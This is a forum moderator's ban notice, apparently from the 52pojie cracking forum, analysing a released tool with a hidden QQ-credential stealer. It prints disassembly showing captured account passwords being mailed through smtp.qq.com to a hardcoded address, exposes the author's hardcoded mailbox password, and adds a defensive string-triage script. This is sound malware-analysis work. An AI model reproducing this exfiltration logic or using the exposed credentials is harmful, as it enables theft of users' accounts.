Ban ID: 1529937 [Released software with a QQ-stealing backdoor added]
Today, during the routine review of new posts in the Originals section, I came across this thread: http://www.52pojie.cn/thread-439861-1-1.html (you can view it via Baidu's cache).
The phrase "if you're afraid it's a virus, stay away" immediately caught my attention; people who distribute trojans are the ones most likely to use this kind of wording to win others' trust. Words alone prove nothing, so it had to be verified technically. I downloaded the file and debugged it. It is packed with SE; running it directly, I saw the following code:
0040B19E 55 push ebp
0040B19F 8BEC mov ebp,esp
0040B1A1 81EC 1C000000 sub esp,0x1C
0040B1A7 6A 00 push 0x0
0040B1A9 6A 00 push 0x0
0040B1AB 6A 00 push 0x0
0040B1AD 68 04000080 push 0x80000004
0040B1B2 6A 00 push 0x0
0040B1B4 68 F17D4C00 push 一键拉好.004C7DF1 ; qwqwqw123
0040B1B9 68 04000080 push 0x80000004
0040B1BE 6A 00 push 0x0
0040B1C0 68 FB7D4C00 push 一键拉好.004C7DFB ; 1529937
0040B1C5 68 01030080 push 0x80000301
0040B1CA 6A 00 push 0x0
0040B1CC 68 19000000 push 0x19
0040B1D1 68 04000080 push 0x80000004
0040B1D6 6A 00 push 0x0
0040B1D8 68 037E4C00 push 一键拉好.004C7E03 ; smtp.qq.com
0040B1DD 68 05000000 push 0x5
0040B1E2 B8 04000000 mov eax,0x4
0040B1E7 BB 40CA4700 mov ebx,一键拉好.0047CA40
0040B1EC E8 3E830000 call 一键拉好.0041352F
0040B1F1 83C4 40 add esp,0x40
0040B1F4 6A FF push -0x1
0040B1F6 6A 08 push 0x8
0040B1F8 68 CB810116 push 0x160181CB
0040B1FD 68 01000152 push 0x52010001
0040B202 E8 2E830000 call 一键拉好.00413535
0040B207 83C4 10 add esp,0x10
0040B20A 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040B20D 6A FF push -0x1
0040B20F 6A 08 push 0x8
0040B211 68 CC810116 push 0x160181CC
0040B216 68 01000152 push 0x52010001
0040B21B E8 15830000 call 一键拉好.00413535
0040B220 83C4 10 add esp,0x10
0040B223 8945 F8 mov dword ptr ss:[ebp-0x8],eax
0040B226 FF75 F8 push dword ptr ss:[ebp-0x8]
0040B229 68 0F7E4C00 push 一键拉好.004C7E0F ; \r\n密码:
0040B22E FF75 FC push dword ptr ss:[ebp-0x4]
0040B231 68 187E4C00 push 一键拉好.004C7E18 ; 账号:
0040B236 B9 04000000 mov ecx,0x4
0040B23B E8 2F5EFFFF call 一键拉好.0040106F
0040B240 83C4 10 add esp,0x10
0040B243 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040B246 8B5D FC mov ebx,dword ptr ss:[ebp-0x4]
0040B249 85DB test ebx,ebx
0040B24B 74 09 je short 一键拉好.0040B256
0040B24D 53 push ebx
0040B24E E8 C4820000 call 一键拉好.00413517
0040B253 83C4 04 add esp,0x4
0040B256 8B5D F8 mov ebx,dword ptr ss:[ebp-0x8]
0040B259 85DB test ebx,ebx
0040B25B 74 09 je short 一键拉好.0040B266
0040B25D 53 push ebx
0040B25E E8 B4820000 call 一键拉好.00413517
0040B263 83C4 04 add esp,0x4
0040B266 6A 00 push 0x0
0040B268 6A 00 push 0x0
0040B26A 6A 00 push 0x0
0040B26C 68 04000080 push 0x80000004
0040B271 6A 00 push 0x0
0040B273 68 1F7E4C00 push 一键拉好.004C7E1F ; 1529937@qq.com
0040B278 BB 06000000 mov ebx,0x6
0040B27D E8 E165FFFF call 一键拉好.00401863
0040B282 68 04000080 push 0x80000004
0040B287 6A 00 push 0x0
0040B289 68 1F7E4C00 push 一键拉好.004C7E1F ; 1529937@qq.com
0040B28E 68 04000080 push 0x80000004
0040B293 6A 00 push 0x0
0040B295 8B45 F4 mov eax,dword ptr ss:[ebp-0xC]
0040B298 85C0 test eax,eax
0040B29A 75 05 jnz short 一键拉好.0040B2A1
0040B29C B8 356D4A00 mov eax,一键拉好.004A6D35
0040B2A1 50 push eax
0040B2A2 68 04000080 push 0x80000004
0040B2A7 6A 00 push 0x0
0040B2A9 68 2E7E4C00 push 一键拉好.004C7E2E ; QQ群盗号
0040B2AE 68 07000000 push 0x7
0040B2B3 B8 04000000 mov eax,0x4
0040B2B8 BB B0CA4700 mov ebx,一键拉好.0047CAB0
0040B2BD E8 6D820000 call 一键拉好.0041352F
0040B2C2 83C4 58 add esp,0x58
0040B2C5 8BD8 mov ebx,eax
0040B2C7 85DB test ebx,ebx
0040B2C9 74 09 je short 一键拉好.0040B2D4
0040B2CB 53 push ebx
0040B2CC E8 46820000 call 一键拉好.00413517
0040B2D1 83C4 04 add esp,0x4
0040B2D4 8B5D F4 mov ebx,dword ptr ss:[ebp-0xC]
0040B2D7 85DB test ebx,ebx
0040B2D9 74 09 je short 一键拉好.0040B2E4
0040B2DB 53 push ebx
0040B2DC E8 36820000 call 一键拉好.00413517
0040B2E1 83C4 04 add esp,0x4
0040B2E4 68 04000200 push 0x20004
0040B2E9 68 D0810116 push 0x160181D0
0040B2EE 68 01000152 push 0x52010001
0040B2F3 68 01000000 push 0x1
0040B2F8 B8 01000000 mov eax,0x1
0040B2FD BB C07B4700 mov ebx,一键拉好.00477BC0
0040B302 E8 28820000 call 一键拉好.0041352F
0040B307 83C4 10 add esp,0x10
0040B30A 6A FF push -0x1
0040B30C 6A 08 push 0x8
0040B30E 68 E2810116 push 0x160181E2
0040B313 68 01000152 push 0x52010001
0040B318 E8 18820000 call 一键拉好.00413535
0040B31D 83C4 10 add esp,0x10
0040B320 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040B323 68 356D4A00 push 一键拉好.004A6D35
0040B328 FF75 FC push dword ptr ss:[ebp-0x4]
0040B32B E8 8E61FFFF call 一键拉好.004014BE
0040B330 83C4 08 add esp,0x8
0040B333 83F8 00 cmp eax,0x0
0040B336 B8 00000000 mov eax,0x0
0040B33B 0F95C0 setne al
0040B33E 8945 F8 mov dword ptr ss:[ebp-0x8],eax
0040B341 8B5D FC mov ebx,dword ptr ss:[ebp-0x4]
0040B344 85DB test ebx,ebx
0040B346 74 09 je short 一键拉好.0040B351
0040B348 53 push ebx
0040B349 E8 C9810000 call 一键拉好.00413517
0040B34E 83C4 04 add esp,0x4
0040B351 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
0040B355 0F84 A9000000 je 一键拉好.0040B404
0040B35B 6A FF push -0x1
0040B35D 6A 08 push 0x8
0040B35F 68 E3810116 push 0x160181E3
0040B364 68 01000152 push 0x52010001
0040B369 E8 C7810000 call 一键拉好.00413535
0040B36E 83C4 10 add esp,0x10
0040B371 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040B374 68 356D4A00 push 一键拉好.004A6D35
0040B379 FF75 F4 push dword ptr ss:[ebp-0xC]
0040B37C E8 3D61FFFF call 一键拉好.004014BE
0040B381 83C4 08 add esp,0x8
0040B384 83F8 00 cmp eax,0x0
0040B387 B8 00000000 mov eax,0x0
0040B38C 0F95C0 setne al
0040B38F 8945 F0 mov dword ptr ss:[ebp-0x10],eax
0040B392 8B5D F4 mov ebx,dword ptr ss:[ebp-0xC]
0040B395 85DB test ebx,ebx
0040B397 74 09 je short 一键拉好.0040B3A2
0040B399 53 push ebx
0040B39A E8 78810000 call 一键拉好.00413517
0040B39F 83C4 04 add esp,0x4
0040B3A2 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040B3A6 0F84 58000000 je 一键拉好.0040B404
0040B3AC 6A FF push -0x1
0040B3AE 6A 08 push 0x8
0040B3B0 68 E4810116 push 0x160181E4
0040B3B5 68 01000152 push 0x52010001
0040B3BA E8 76810000 call 一键拉好.00413535
0040B3BF 83C4 10 add esp,0x10
0040B3C2 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040B3C5 68 356D4A00 push 一键拉好.004A6D35
0040B3CA FF75 EC push dword ptr ss:[ebp-0x14]
0040B3CD E8 EC60FFFF call 一键拉好.004014BE
0040B3D2 83C4 08 add esp,0x8
0040B3D5 83F8 00 cmp eax,0x0
0040B3D8 B8 00000000 mov eax,0x0
0040B3DD 0F95C0 setne al
0040B3E0 8945 E8 mov dword ptr ss:[ebp-0x18],eax
0040B3E3 8B5D EC mov ebx,dword ptr ss:[ebp-0x14]
0040B3E6 85DB test ebx,ebx
0040B3E8 74 09 je short 一键拉好.0040B3F3
0040B3EA 53 push ebx
0040B3EB E8 27810000 call 一键拉好.00413517
0040B3F0 83C4 04 add esp,0x4
0040B3F3 837D E8 00 cmp dword ptr ss:[ebp-0x18],0x0
0040B3F7 0F84 07000000 je 一键拉好.0040B404
0040B3FD B8 01000000 mov eax,0x1
0040B402 EB 05 jmp short 一键拉好.0040B409
0040B404 B8 00000000 mov eax,0x0
0040B409 85C0 test eax,eax
0040B40B 0F84 32000000 je 一键拉好.0040B443
0040B411 BB 06000000 mov ebx,0x6
0040B416 E8 4864FFFF call 一键拉好.00401863
0040B41B 68 06000080 push 0x80000006
0040B420 6A 00 push 0x0
0040B422 68 6BA44000 push 一键拉好.0040A46B
0040B427 68 03000000 push 0x3
0040B42C B8 03000000 mov eax,0x3
0040B431 BB 30C94700 mov ebx,一键拉好.0047C930
0040B436 E8 F4800000 call 一键拉好.0041352F
0040B43B 83C4 28 add esp,0x28
0040B43E E9 34000000 jmp 一键拉好.0040B477
0040B443 BB 06000000 mov ebx,0x6
0040B448 E8 1664FFFF call 一键拉好.00401863
0040B44D 68 01030080 push 0x80000301
0040B452 6A 00 push 0x0
0040B454 68 10000000 push 0x10
0040B459 68 04000080 push 0x80000004
0040B45E 6A 00 push 0x0
0040B460 68 377E4C00 push 一键拉好.004C7E37 ; 请重新登录QQ!
0040B465 68 04000000 push 0x4
0040B46A BB 604B4100 mov ebx,一键拉好.00414B60
0040B46F E8 B5800000 call 一键拉好.00413529
0040B474 83C4 34 add esp,0x34
0040B477 8BE5 mov esp,ebp
0040B479 5D pop ebp
0040B47A C3 retn
So what does the code do? Put simply, it takes the QQ account and password captured by the login software, logs in to a mailbox using QQ number 1529937 and password qwqwqw123, and sends them to his own mailbox, 1529937@qq.com. The description string is "QQ群盗号" (QQ group account theft), which is quite blunt. Looking up the QQ number shows the same name as this thread's author, so it should indeed be him. This little black-hat's intelligence is worrying: he actually hardcoded his own QQ password into the program. Whether he stole anyone else's QQ account is unknown, but his own QQ has probably already been stolen by now.
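As an added example (not code from the original post or from the analysed program), the following Python triage script pulls GBK strings out of a constructed byte blob mimicking the program's string table and flags the combination the listing above shows: an SMTP host, a hardcoded mailbox address, and account/password labels next to each other. The sample blob, the regexes and the label list are assumptions chosen for this illustration.

```python
import re

# Constructed sample (not the real binary): a few code bytes followed by the
# same NUL-terminated strings the listing above references. Easy Language
# builds store narrow strings in GBK, so the sample is encoded that way.
SAMPLE_BLOB = (
    b"\x55\x8b\xec\x81\xec\x1c\x00\x00\x00"
    + "smtp.qq.com".encode("gbk") + b"\x00"
    + "1529937@qq.com".encode("gbk") + b"\x00"
    + "\r\n密码:".encode("gbk") + b"\x00"
    + "账号:".encode("gbk") + b"\x00"
    + "QQ群盗号".encode("gbk") + b"\x00"
    + "请重新登录QQ!".encode("gbk") + b"\x00"
)

SMTP_HOST = re.compile(r"^smtp\.[a-z0-9.-]+$", re.I)
MAILBOX = re.compile(r"^[\w.+-]+@[\w-]+\.[\w.-]+$")
CRED_LABELS = ("账号", "密码", "account", "password", "passwd")


def extract_strings(blob, min_len=3):
    """Return NUL-terminated runs that decode as printable GBK text."""
    found = []
    for run in blob.split(b"\x00"):
        try:
            text = run.decode("gbk")
        except UnicodeDecodeError:
            continue  # code bytes, not a string
        text = text.strip("\r\n")
        if len(text) >= min_len and text.isprintable():
            found.append(text)
    return found


def triage(strings):
    """Flag the exfiltration pattern: SMTP host + mailbox + credential labels."""
    hosts = [s for s in strings if SMTP_HOST.match(s)]
    boxes = [s for s in strings if MAILBOX.match(s)]
    labels = [s for s in strings if any(k in s.lower() for k in CRED_LABELS)]
    return {
        "smtp_hosts": hosts,
        "mailboxes": boxes,
        "credential_labels": labels,
        "suspicious": bool(hosts and boxes and labels),
    }


if __name__ == "__main__":
    print(triage(extract_strings(SAMPLE_BLOB)))
```

On a real sample the strings would come from the unpacked image's data section; a hit is a reason to look at the send-mail call sites, not proof by itself.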
Note:
Anyone who has used this software should change their QQ password as soon as possible.
To those with bad intentions: if you try these little tricks on a technical forum like 52pojie (吾爱破解), you will be skinned and laid bare within minutes. The people here are the elite active in the internet security field, and any sneaky move is asking for trouble. I advise those who are tempted to get onto the right path quickly and not go astray!
Finally, thanks to everyone for your long-standing support and maintenance of the 52pojie forum. Forum security depends on everyone's oversight; no illegal or rule-breaking behaviour escapes everyone's eyes and the moderators' review. We will show no mercy to scum of this kind and will punish them to the end!